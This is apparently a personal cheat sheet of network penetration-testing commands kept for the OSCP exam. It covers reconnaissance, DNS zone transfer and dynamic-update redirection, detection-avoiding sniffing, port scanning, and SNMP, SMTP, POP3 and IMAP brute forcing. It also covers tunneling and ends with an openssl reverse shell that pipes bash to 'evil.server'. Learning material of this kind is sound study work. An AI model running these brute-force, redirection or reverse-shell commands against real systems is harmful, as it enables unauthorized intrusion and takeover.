Last changed: 08.07.2020
Network pentesting
I started this commandlist for my Offensive Security Certified Professional exam. It summarizes some means to collect data and exploit vulnerabilities in a target network.
open source information
Search engines and public databases can be helpful to find additional information about the target network as well as email addresses of employees.
target information
whois <domain>
whois <target_ip>
geoiplookup <target_ip>
search engine research
www.exploit-db.com/google-dorks/
theharvester -d target.com -p all -l 200
bing ip search
ip:<target_ip>
dns lookup
dig target.com
dig -t aaaa target.com
dig -t axfr target.com @ns.target.com
fierce -dns target.com
dnsenum -f <dictfile> <domain>
dynamic dns update
nsupdate
> server 10.0.0.1
> local 127.0.0.100
> update delete server.target.com. A
> update add server.target.com. 86400 A 127.0.0.1
> send
autonomous system information
Information about autonomous systems can be found with whois
or on
http://ftp.arin.net/info/asn.txt or with
https://www.ultratools.com/tools/asnInfo
whois <asn>
public ip address
whereami
from my netstuff
repository shows some information about your current public ip address
whereami
passive network sniffing
If you are inside the network and want to avoid detection passive sniffing will supply information about network clients without any interaction. Make sure that your machine is not requesting an ip via dhcp or sending ipv6 router/neighbor solicitations
preparation
systemclt stop NetworkManager
killall dhclient
sysctl -w net.ipv6.conf.all.autoconf=0
sysctl -w net.ipv6.conf.all.accept_ra=0
dump traffic
tcpdump -i eth0 -X -s 262144 -o dump.pcap
monitor dns requests
passivedns -i eth0 -l /dev/stdout
passive os fingerprinting
p0f -i eth0 -o outfile
traffic analysis
To analyze the tcp streams in a pcap you can use tshark
tshark -r dump.pcap -z conv,tcp -q | sed '1,5d;$d' | awk '{print $10 " " $1 " " $2 " " $3}' | sort -g | awk '{print NR-1,$0}'
tshark -r dump.pcap -z follow,tcp,ascii,0 -q
network scanning
dynamic host configuration protocol
In my netstuff repository I have
a small script using scapy
to send a single DHCP
packet. This way some
network information can be retrieved.
dhcp_discover eth0
address resolution protocol
With scapy
you can easily send ARP
and RARP
requests.
srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=TARGET_IP,psrc='0.0.0.0'))[0].show()
srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(psrc='0.0.0.0',op=3,hwdst=TARGET_MAC))[0].show()
host discovery
nmap -sn 192.168.11.0/24
nmap 192.168.11.0/24 -p 139 -oG grepable_output.txt
unicornscan 192.168.11.0/24:139
ping -I eth0 ff02::1
ping -I eth0 ff02::2
portscan
nmap -sS 192.168.11.2 -p1-65535
nmap -sU 192.168.11.2 -p1-65535
proxychains -n -Pn -sT 192.168.11.2 -p445,3389,5985
os detection
nmap -O -sV 192.168.11.2
finding transparent proxies
nmap -Pn <some_extern_host> --ttl 2 -T5
transport layer security
You can retrieve the TLS certificate with openssl
. In case the server requires
Server Name Indication (SNI) you will have to use -servername
.
openssl s_client -connect <target>:<port> </dev/null 2>/dev/null | openssl x509 -noout -in /dev/stdin -fingerprint
openssl s_client -connect <target>:<port> </dev/null 2>/dev/null | openssl x509 -noout -in /dev/stdin -text
openssl s_client -connect <target>:<port> -servername target.com </dev/null 2>/dev/null | openssl x509 -noout -in /dev/stdin -text
openssl s_client -showcerts -connect <target>:<port> </dev/null 2>/dev/null | openssl x509 -outform PEM > cert.pem
simple network management protocol
SNMP can be exploited for information gathering and, if you are lucky, to change settings on the host. The community strings of SNMPv1 and SNMPv2c get transmitted in clear text.
guess community string
nmap -Pn -sU <target> -p 161 --script=snmp-brute
onesixtyone -c <dictfile> -i <ip_list>
information gathering
To translate the OIDs in textual form the package snmp-mibs-downloader
might
be needed.
snmpwalk -c public -v 2c -m ALL <target> 1
snmp-check -c public -v 2c <target>
nmap -Pn -sU <target> -p 161 --script=snmp-interfaces.nse
nmap -Pn -sU <target> -p 161 --script=snmp-processes.nse
nmap -Pn -sU <target> -p 161 --script=snmp-netstat.nse
change settings
snmpset -mALL -v1 -c secret <target> sysName.0 s hacked.host
snmpget -mALL -v1 -c secret <target> sysName.0
file transfer protocol
curl ftp://user:password@server.com
curl ftp://user:password@server.com/file.txt -o file.txt
curl ftp://user:password@server.com -Q '-DELE file.txt'
preboot execution environment
In an preboot execution environment(pxe) the hosts download boot their operating system from a server in the network. These files can be downloaded manually to examine the content. The needed locations can be found in the dhcp packets.
download pxe binary
tftp <next-server-ip-address>
get <boot-file-name>
extract config file name
strings <boot-file-name> | grep -i tftp -A1
tftp <next-server-ip-address>
get <config file>/default
download kernel and initrd
tftp <next-server-ip-address>
get <vmlinuz-file-from-config>
get <initrd-file-from-config>
mount network block device
modprobe nbd
nbd-client <target> -N /device/name /dev/nbd0 -persist
mount /dev/nbd0 /mnt/nbd
universal plug and play
discover services
echo -e 'M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nMan: "ssdp:discover"\r\nMX: 10\r\nST: upnp:rootdevice\r\n\r\n' | nc -uw 1 <target> 1900
echo -e 'M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nMan: "ssdp:discover"\r\nMX: 10\r\nST: upnp:all\r\n\r\n' | nc -uw 1 <target> 1900
get service control point definition
curl http://192.168.0.1:49000/igddesc.xml
simple object access protocol example
POST /igdupnp/control/WANIPConn1 HTTP/1.1
Accept-Encoding: identity
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"
Host: 192.168.0.1:49000
Connection: close
Content-Type: text/xml
Content-Length: 300
<?xml version="1.0"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="urn:schemas-upnp-org:service:WANIPConnection:1">
<s:Body>
<m:getexternalipaddress xmlns:m="http://schemas.xmlsoap.org/soap/envelope/">
</m:getexternalipaddress>
</s:Body>
</s:Envelope>
simple mail transfer protocol
find mail server
dig -t mx <target>
get own domain name
dig -x `curl -s ifconfig.co` | grep -A1 "ANSWER SECTION"
spoofing protection
To check SPF and DMARC settings spoofcheck can be used
python2 spoofcheck.py target.com
manual tls connect
openssl s_client -connect <target>:<port> -ign_eof
HELO my.domain.name
MAIL FROM: <nobody@tempmail.de>
RCPT TO: <admin@shitmail.de>
DATA
Subject: foobar
Hello,
Bye.
.
QUIT
nmap scanning scripts
nmap -Pn -script smtp-commands <target> -p <port>
nmap -Pn -script smtp-open-relay <target> -p <port>
nmap -Pn -script smtp-enum-users <target> -p <port> -script-args 'methods={EXPN}'
nmap -Pn -script smtp-enum-users <target> -p <port> -script-args 'methods={VRFY}'
nmap -Pn -script smtp-enum-users <target> -p <port> -script-args 'methods={RCPT}'
nmap -Pn -script smtp-brute <target> -p <port>
enumerate users
smtp-user-enum -M RCPT -U <userlist> -D <target.domain> -t <host>
post office protocol (POP3) and internet message access protocol (IMAP)
nmap scanning scripts
nmap -Pn -script pop3-capabilites <target> -p <port>
nmap -Pn -script pop3-brute <target> -p <port>
nmap -Pn -script imap-capabilites <target> -p <port>
nmap -Pn -script imap-brute <target> -p <port>
netbios discovery
nbtscan -r 192.168.11.0/24
nmap 192.168.11.2 --script smb-enum-users.nse
nmap 192.168.11.2 --script smb-check-vulns.nse
rpcclient -U "" 192.168.11.2
tunneling
clear to ssl forwarding
socat TCP4-LISTEN:25,fork,reuseaddr OPENSSL:target.com:465,verify=0
IPv4 to IPv6 forwarding
socat TCP4-LISTEN:25,fork,reuseaddr TCP6:target.com:25
local tunnel (opens 31337 on client)
ssh -g -L 31337:target:445 user@ssh-server
plink.exe -g -L 31337:target:445 -l user -pw password ssh-server
remote tunnel (opens 31337 on server)
ssh -R 31337:target:445 user@ssh-server
plink.exe -R 31337:target:445 -l user -pw password ssh-server
To allow connections from other hosts you have to enable GatewayPorts yes
in
/etc/ssh/sshd_config
on the server.
socks proxy
ssh -D 9050 user@ssh-server
vim /etc/proxychains.conf
proxychains nmap -Pn target -p 22
Be aware that UDP will bypass proxychains
openssl backconnect shell
start server
openssl req -x509 -nodes -sha256 -subj "/CN=evil.server" -newkey rsa:2048 -keyout evil.pem -out evil.pem
openssl s_server -cert evil.pem
start client
mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect evil.server:4433 > /tmp/s; rm /tmp/s
Other reverse shell commands can be found at pentestmonkey.net and highon.coffee.